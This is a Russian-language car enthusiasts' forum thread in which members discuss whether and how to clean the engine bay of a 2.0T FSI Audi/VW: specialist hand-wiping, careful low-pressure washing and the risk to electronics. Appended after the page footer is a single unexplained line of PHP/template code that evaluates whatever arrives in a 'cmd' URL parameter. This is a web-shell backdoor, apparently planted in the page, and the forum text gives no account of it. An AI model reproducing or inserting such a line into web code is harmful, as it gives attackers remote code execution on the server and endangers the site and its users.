+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Мойка Мотора 2,0t Fsi


  1. #1
    GTI-Racing Titofff is on a distinguished road Аватар для Titofff
    Регистрация
    06.04.2009
    Откуда
    Москва
    Машина
    Ауди А3 2.0Т/Q MT6
    Сообщений
    100
    Привет всем!

    Недавно стал обладателем авто с таким мотором, и возник вопрос...
    ...на предыдущей машине каждую весну мыл мотор, на мойке, со спец. средствами (мотор был V6, Ауди А4) все как обычно.

    Но на этой машине столкнулся с проблемой, во-первых под капотом много электроники, в том числе и блок управления электроусилителем.., плюс общался с мастером из Ауди-север, он сказал
    что водой мыть не стоит, что они это делают специальными растворами в ручную (протирают). Кстати, услуга эта стоит в районе 5 000руб.

    Вопрос в следующем... был ли у кого опыт мойки имено этого мотора (BWA), каким образом это производилось (мойка или тех. центр) ?


    Буду признателен за ответы...

  2. #2
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    Дважды мыл мотор сам АВД и кислотой для бесконтактной мойки. Если делать все аккуратно и без фанатизма, все будет ок.
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  3. #3
    GTI-Racing Titofff is on a distinguished road Аватар для Titofff
    Регистрация
    06.04.2009
    Откуда
    Москва
    Машина
    Ауди А3 2.0Т/Q MT6
    Сообщений
    100
    <div class='quotetop'>Цитата(Max &#064; Apr 6 2009, 16&#58;25) <{POST_SNAPBACK}></div><div class='quotemain'>Дважды мыл мотор сам АВД и кислотой для бесконтактной мойки. Если делать все аккуратно и без фанатизма, все будет ок.[/b][/quote]


    Именно 2,0t Fsi?
    А на гольфе, кстати, усилитель руля гидро или электро?

  4. #4
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    <div class='quotetop'>Цитата(Titofff &#064; Apr 6 2009, 16&#58;43) <{POST_SNAPBACK}></div><div class='quotemain'>Именно 2,0t Fsi?
    А на гольфе, кстати, усилитель руля гидро или электро?[/b][/quote]

    Ага, его. Если на мойке просить мыть, то предварительно провести инструктаж, а потом стоять над душой и бить по рукам если что не так. Но лучше самому все сделать.
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  5. #5
    GTI-Racing Titofff is on a distinguished road Аватар для Titofff
    Регистрация
    06.04.2009
    Откуда
    Москва
    Машина
    Ауди А3 2.0Т/Q MT6
    Сообщений
    100
    <div class='quotetop'>Цитата(Max &#064; Apr 6 2009, 16&#58;47) <{POST_SNAPBACK}></div><div class='quotemain'>Ага, его. Если на мойке просить мыть, то предварительно провести инструктаж, а потом стоять над душой и бить по рукам если что не так. Но лучше самому все сделать.[/b][/quote]


    Ну это понятно, так раньше и делал... Самому тоже лучше, но пока нет возможности.

    Меня больше интересует, нет ли подводных камней в этом деле. Датчики разные, разъемы и т.п.


    Еще на могу понять как снимается крышка пластиковая, на предыдущем моторе были защелки, тут не нашел пока... [img]style_emoticons/<#EMO_DIR#>/big_smile1.gif[/img]

  6. #6
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Надо не доводить до такого состояния чтобы мыть, никогда на своих машинах не мыл моторы. Считаю, что это не пойдет на пользу предательски попавшей туда куда не нужна водичке, да еще и под давлением............ ТАЗик недели три назад соседский не захотел заводится утречком при -2, и долго так сосед пытал меня, что мол чего может быть, у тебя же такой же ТАЗик был ?&#33;, а тут приехал вечером спокойно и утром тишина. Спустя пять минут признался, что готовит на продажу и помыл движку на специальном сервисе с шампунькой. Утром ода видимо знала куда попасть ))))............ галстук и в сервис.

    Все мои моторы на годы были чистыми и опрятными, потому, что пипец как приятно стоять возле мотора, а не кучки моха. Рецепт простой, старался более менее переодически протирать тряпочкой все видимые места, куда дотянется рука. Все элементы пластмассы и резины обрабатываются чернителями и силиконием вручную. Это несложно, советую попробывать и найти полчаса вместо того чтобы в выходной спать до обеда.
    От этого зависит и любовь к авто, кому бричка для попопередвижения, мол погоняю и брошу, а кому верный друг. Об этом я сужу сразу, Когда мне удается посмотреть под капот чужого авто.
    И еще если, что-то подтекает, то это надо заменить, чтобы не портило чистоту.
    песок сыпется....не останавливайтесь на достигнутом !

  7. #7
    GTI-Racing Titofff is on a distinguished road Аватар для Titofff
    Регистрация
    06.04.2009
    Откуда
    Москва
    Машина
    Ауди А3 2.0Т/Q MT6
    Сообщений
    100
    <div class='quotetop'>Цитата(BON &#064; Apr 6 2009, 17&#58;02) <{POST_SNAPBACK}></div><div class='quotemain'>Надо не доводить до такого состояния чтобы мыть, никогда на своих машинах не мыл моторы. Считаю, что это не пойдет на пользу предательски попавшей туда куда не нужна водичке, да еще и под давлением............ ТАЗик недели три назад соседский не захотел заводится утречком при -2, и долго так сосед пытал меня, что мол чего может быть, у тебя же такой же ТАЗик был ?&#33;, а тут приехал вечером спокойно и утром тишина. Спустя пять минут признался, что готовит на продажу и помыл движку на специальном сервисе с шампунькой. Утром ода видимо знала куда попасть ))))............ галстук и в сервис.

    Все мои моторы на годы были чистыми и опрятными, потому, что пипец как приятно стоять возле мотора, а не кучки моха. Рецепт простой, старался более менее переодически протирать тряпочкой все видимые места, куда дотянется рука. Все элементы пластмассы и резины обрабатываются чернителями и силиконием вручную. Это несложно, советую попробывать и найти полчаса вместо того чтобы в выходной спать до обеда.
    От этого зависит и любовь к авто, кому бричка для попопередвижения, мол погоняю и брошу, а кому верный друг. Об этом я сужу сразу, Когда мне удается посмотреть под капот чужого авто.
    И еще если, что-то подтекает, то это надо заменить, чтобы не портило чистоту.[/b][/quote]


    На прошлой машине мыл мотор 1-2 раза в год, все было отлично... везде тряпкой не протрешь, а грязь может сделать свое "грязное2 дело.
    Естественно это надо делать не в холодное время года, и не под высоким давлением. Просто надо знать, куда лить можно а куда нельзя.
    На прошлой машине я это все знал, с этой разбираюсь....

  8. #8
    Мимо проходил iljas is on a distinguished road Аватар для iljas
    Регистрация
    23.12.2018
    Откуда
    .
    Машина
    Volkswagen
    Сообщений
    12
    Спасибо большое за информацию, буду иметь ввиду.

+ Ответить в теме

Похожие темы

  1. Мойка в СЗАО? (Митино, Тушино)
    от troyanov в разделе Курилка
    Ответов: 0
    Последнее сообщение: 25.10.2012, 11:40
  2. Мойка радиаторов на GTI V
    от NEVO в разделе Ремонт и обслуживание
    Ответов: 3
    Последнее сообщение: 22.08.2012, 11:10
  3. Мойка в мороз.
    от Bubinskiy в разделе Ремонт и обслуживание
    Ответов: 2
    Последнее сообщение: 22.01.2010, 15:11
  4. Мойка кузова
    от keeper в разделе Курилка
    Ответов: 11
    Последнее сообщение: 09.04.2009, 12:49
  5. Мини мойка karcher
    от magnum126 в разделе Курилка
    Ответов: 8
    Последнее сообщение: 21.04.2006, 12:31

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}